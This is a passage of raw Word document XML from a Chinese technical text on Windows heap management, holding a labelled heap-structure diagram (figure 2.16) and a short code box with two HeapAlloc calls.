                          <w:txbxContent>
                            <w:p w14:paraId="22BAB873" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>用户分配内存区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文本框 57"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="507587" y="1507193"/>
                            <a:ext cx="567055" cy="387350"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4F2A6008" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>hHeap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连接符: 肘形 58"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000">
                            <a:off x="190345" y="729621"/>
                            <a:ext cx="317243" cy="97175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文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1889463" y="1662763"/>
                            <a:ext cx="1123315" cy="676910"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="173F60E8" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                  <w:kern w:val="2"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                                  <w:kern w:val="2"/>
                                </w:rPr>
                                <w:t>定位分配内存，</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="7575538F" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>释放内存的位置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连接符: 肘形 71"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000">
                            <a:off x="1817603" y="729701"/>
                            <a:ext cx="71860" cy="127157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文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3498603" y="1181370"/>
                            <a:ext cx="1170940" cy="426085"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="55178477" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>H</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
                                </w:rPr>
                                <w:t>eap</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>主体缓冲区</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3" name="连接符: 肘形 73"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000">
                            <a:off x="2866365" y="729519"/>
                            <a:ext cx="632239" cy="66464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2C0FD77" id="画布 233" o:spid="_x0000_s1059" editas="canvas" style="width:394.05pt;height:202.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="50044,25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&#10;eG1sUEsFBgAAAAAEAAQA8wAAAGoIAAAAAA==&#10;">
                <v:shape id="_x0000_s1060" type="#_x0000_t75" style="position:absolute;width:50044;height:25711;visibility:visible;mso-wrap-style:square">
                  <v:fill o:detectmouseclick="t"/>
                  <v:path o:connecttype="none"/>
                </v:shape>
                <v:rect id="矩形 51" o:spid="_x0000_s1061" style="position:absolute;left:1903;top:3868;width:162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HxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RW81Y2C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IaUL4fEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" fillcolor="white [3201]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="1D5BF448" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
                          </w:rPr>
                          <w:t>Heap</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>总体管理结构</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 53" o:spid="_x0000_s1062" style="position:absolute;left:18176;top:3868;width:104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14:paraId="6BD7126B" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>双指针区</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 54" o:spid="_x0000_s1063" style="position:absolute;left:28663;top:3875;width:1463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wfxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heUJvulFa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bjjB/EAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" fillcolor="white [3201]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="22BAB873" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>用户分配内存区</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="文本框 57" o:spid="_x0000_s1064" type="#_x0000_t202" style="position:absolute;left:5075;top:15071;width:5671;height:3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14:paraId="4F2A6008" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>hHeap</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shapetype id="_x0000_t33" coordsize="21600,21600" o:spt="33" o:oned="t" path="m,l21600,r,21600e" filled="f">
                  <v:stroke joinstyle="miter"/>
                  <v:path arrowok="t" fillok="f" o:connecttype="none"/>
                  <o:lock v:ext="edit" shapetype="t"/>
                </v:shapetype>
                <v:shape id="连接符: 肘形 58" o:spid="_x0000_s1065" type="#_x0000_t33" style="position:absolute;left:1903;top:7296;width:3172;height:97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NtwwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/BagIx&#10;EIbvBd8hjNBbzVpQymqUIrbYk9UW6XFIppulm8l2E9f17Z1Docfhn/+bb5brITSqpy7VkQ1MJwUo&#10;YhtdzZWBz4+XhydQKSM7bCKTgSslWK9Gd0ssXbzwgfpjrpRAOJVowOfcllon6ylgmsSWWLLv2AXM&#10;MnaVdh1eBB4a/VgUcx2wZrngsaWNJ/tzPAfR2B5CfO2/7ICb0+/e2/cwe6uMuR8PzwtQmYb8v/zX&#10;3jkDM5GVXwQAenUDAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAzl7jbcMAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" strokecolor="black [3200]" strokeweight=".5pt">
                  <v:stroke endarrow="block"/>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1066" type="#_x0000_t202" style="position:absolute;left:18894;top:16627;width:11233;height:6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a1wgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/Pa4Mw&#10;FL4P9j+EV9htjXZQ1DUtRSh42A5zLbs+zKtKzYtLMrX//XIY7Pjx/d4dFjOIiZzvLStI1wkI4sbq&#10;nlsF58/TcwbCB2SNg2VScCcPh/3jww4LbWf+oKkOrYgh7AtU0IUwFlL6piODfm1H4shdrTMYInSt&#10;1A7nGG4GuUmSrTTYc2zocKSyo+ZW/xgF72VeZ9Xm7r7yl+pUZ9+pfcsuSj2tluMriEBL+Bf/uSut&#10;YBvHxi/xB8j9LwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQB0ava1wgAAANsAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="173F60E8" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                            <w:kern w:val="2"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                            <w:kern w:val="2"/>
                          </w:rPr>
                          <w:t>定位分配内存，</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7575538F" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>释放内存的位置</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="连接符: 肘形 71" o:spid="_x0000_s1067" type="#_x0000_t33" style="position:absolute;left:18176;top:7297;width:718;height:1271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RaQxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;EIXvBf9DGKG3mlWwytYoRay0p+oq4nFIppulm8l2k67bf98IgsfHm/e9eYtV72rRURsqzwrGowwE&#10;sfam4lLB8fD2NAcRIrLB2jMp+KMAq+XgYYG58RfeU1fEUiQIhxwV2BibXMqgLTkMI98QJ+/Ltw5j&#10;km0pTYuXBHe1nGTZs3RYcWqw2NDakv4ufl16Y7N3ftuddY/r08+n1Ts3/SiVehz2ry8gIvXxfnxL&#10;vxsFszFctyQAyOU/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhABTRFpDEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" strokecolor="black [3200]" strokeweight=".5pt">
                  <v:stroke endarrow="block"/>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1068" type="#_x0000_t202" style="position:absolute;left:34986;top:11813;width:11709;height:42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1eCxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gRvdWOENqauIoKQgx4alV4f2dckNPs27q4a/71bKPQ4zMw3zHI9mE7cyPnWsoLZNAFB&#10;XFndcq3gdNy9ZiB8QNbYWSYFD/KwXo1elphre+dPupWhFhHCPkcFTQh9LqWvGjLop7Ynjt63dQZD&#10;lK6W2uE9wk0n0yR5kwZbjgsN9rRtqPopr0bBYbsosyJ9uK/FvNiV2WVm99lZqcl42HyACDSE//Bf&#10;u9AK3lP4/RJ/gFw9AQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJBbV4LEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="55178477" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>H</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
                          </w:rPr>
                          <w:t>eap</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>主体缓冲区</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="连接符: 肘形 73" o:spid="_x0000_s1069" type="#_x0000_t33" style="position:absolute;left:28663;top:7295;width:6323;height:664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18xAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawIx&#10;EMXvgt8hjNCbZrXUltUoIm1pT/5pEY9DMm4WN5PtJl23374RBI+PN+/35s2XnatES00oPSsYjzIQ&#10;xNqbkgsF319vwxcQISIbrDyTgj8KsFz0e3PMjb/wjtp9LESCcMhRgY2xzqUM2pLDMPI1cfJOvnEY&#10;k2wKaRq8JLir5CTLptJhyanBYk1rS/q8/3Xpjded8+/tUXe4PvxsrN66p89CqYdBt5qBiNTF+/Et&#10;/WEUPD/CdUsCgFz8AwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAItPLXzEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" strokecolor="black [3200]" strokeweight=".5pt">
                  <v:stroke endarrow="block"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE1260D"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hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">.16 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>堆区结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217D9A31"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接下来介绍Windows堆管理流程，考虑以下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A910418"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w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61412E6E" wp14:editId="1C9F1F22">
                <wp:extent cx="3672840" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="381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04620"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="2E0DB933" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                            <w:pPr>
                              <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                                <w:szCs w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
                                <w:szCs w:val="21"/>
                              </w:rPr>
                              <w:t>代码</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
                                <w:szCs w:val="21"/>
                              </w:rPr>
                              <w:t>2</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                                <w:szCs w:val="21"/>
                              </w:rPr>
                              <w:t>.5</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5F86A940" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="005C5762" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                            <w:pPr>
                              <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                              <w:ind w:firstLine="420"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                                <w:szCs w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="005C5762">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                                <w:szCs w:val="21"/>
                              </w:rPr>
                              <w:t>buf1 =(char*)HeapAlloc(hHeap, 0, 16);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4C17F748" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="005C5762" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                            <w:pPr>
                              <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                              <w:ind w:firstLine="420"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                                <w:szCs w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="005C5762">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                                <w:szCs w:val="21"/>
                              </w:rPr>
                              <w:t>buf2 =(char*)HeapAlloc(hHeap, 0, 16);</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                        <a:spAutoFit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
